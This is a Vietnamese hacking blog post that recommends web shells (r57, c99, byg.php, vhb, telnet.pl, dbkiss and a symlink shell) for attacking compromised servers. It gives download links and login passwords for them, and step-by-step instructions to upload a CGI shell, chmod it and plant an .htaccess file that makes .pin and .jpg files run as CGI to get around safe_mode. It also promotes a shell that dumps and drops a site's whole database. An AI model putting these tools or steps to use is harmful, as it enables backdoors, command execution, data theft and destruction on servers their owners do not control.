Share Và Giới Thiệu Tính Năng 1 Số Shell


Nói đến local là nói đến shell, không có shell thì chỉ local bằng niềm tin. Hôm nay Vô Ưu giới thiệu một số loại shell thông dụng không thể thiếu trong local attack

Một số shell thông dụng:

 r57.php
https://r57.gen.tr/




R57 hiện nay đang là shell thông dụng, được sử dụng phổ biến nhất với hầu như là đầy đủ các tính năng.

c99.php

https://r57.gen.tr/

Nói đến r57 cũng không thể  không nhắc đến c99 với các thao tác có sẵn trên shell mà không cần phải sử dụng lệnh: edit, del, insert, drop… đặc biệt là có khả năng dump cơ sở dữ liệu








byg.php

https://drive.google.com/file/d/0BxTrDVTYt0wwaWNNLS1zVk9yRWs/edit?usp=sharing
Byg hiện đang là shell mà được Vô Ưu sử dụng nhiều nhất với các chức năng có sẵn và thao tác dễ sử dụng








pass login: byg
          
VHB Shell    vhb.php

        Con shell này đã được Soleil Edit và Deveple bằng chính con shell Byg.php trên với 1 số tính năng mạnh hơn và giao diện đẹp, bắt mắt hơn. Đây là con shell chính mà Vô Ưu thường sử dụng nhất.

  
https://drive.google.com/file/d/0BxTrDVTYt0wwV2ZvTkxJQjNFZjQ/edit?usp=sharing 
  Pass login: vhb



      vhb.pin



https://drive.google.com/file/d/0BxTrDVTYt0wwRlljUWt5ZjhpX2s/edit?usp=sharing 

Nếu Server Safe_mod: ON,  cả shell r57 và c99 đều không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được.  Giải pháp được nghĩ đến là sử dụng shell cgi mà chức năng chính của nó là thực thi các câu lệnh.


 Pass login: ducdung.08clc

Cách sử dụng:
-          Up shell vhb.pin và chmod nó về 755
-          Up hoặc tạo file .htaccess có nội dung:

## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl cgi gmc pin jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##

Hoặc:
Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .cin

AddHandler cgi-script .pin
AddHandler cgi-script .pin




 telnet.php

https://drive.google.com/file/d/0BxTrDVTYt0wwYml5MHJoUHkxWWM/edit?usp=sharing

Để sử dụng shell cgi được thuận tiên hơn, Vô Ưu giới thiệu shell telnet.pl. Chức năng hoàn toàn tương tự với con shell vhb.pin
Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần chmod nó về 755 là run ngon.









datakiss.php
đây là 1 con shell có khả năng lấy toàn bộ data của một web không bị lỗi và drop toàn bộ data





download   http://www.mediafire.com/view/1b4h9840fq6gtxb/dbkiss.php



symlink prodigy-tn.php đây là 1 con symlink theo vô ưu thấy khả năng get symlink của nó rất tốt trên nhiều loại sever khác nhau




 
download http://www.mediafire.com/view/ppk2ffnrpve1bdw/prodigy-tn.php


user và pass login:  prodigy-tn


Shell xml: Up shell đối với vbulletin

https://drive.google.com/file/d/0BwSvmW5i-fh-TFpqOTFNZ1ZsQVE/edit?usp=sharing

Share on Google Plus

About Vo Uu

Tác Giả là người chuyên nghiên cứu về các kỹ thuật hacking, security, marketing, là người có góc nhìn lạ và đi sâu vấn đề cũng như là một con người thẳng thắn góp ý. Nếu sử dụng bài trên blog mong các bạn dẫn lại nguồn tác giả!!! Tác Giả rất mong có sự đóng góp hội ý từ cộng đồng để cho an toàn an ninh mạng việt nam ngày càng được an toàn hơn!!

2 nhận xét: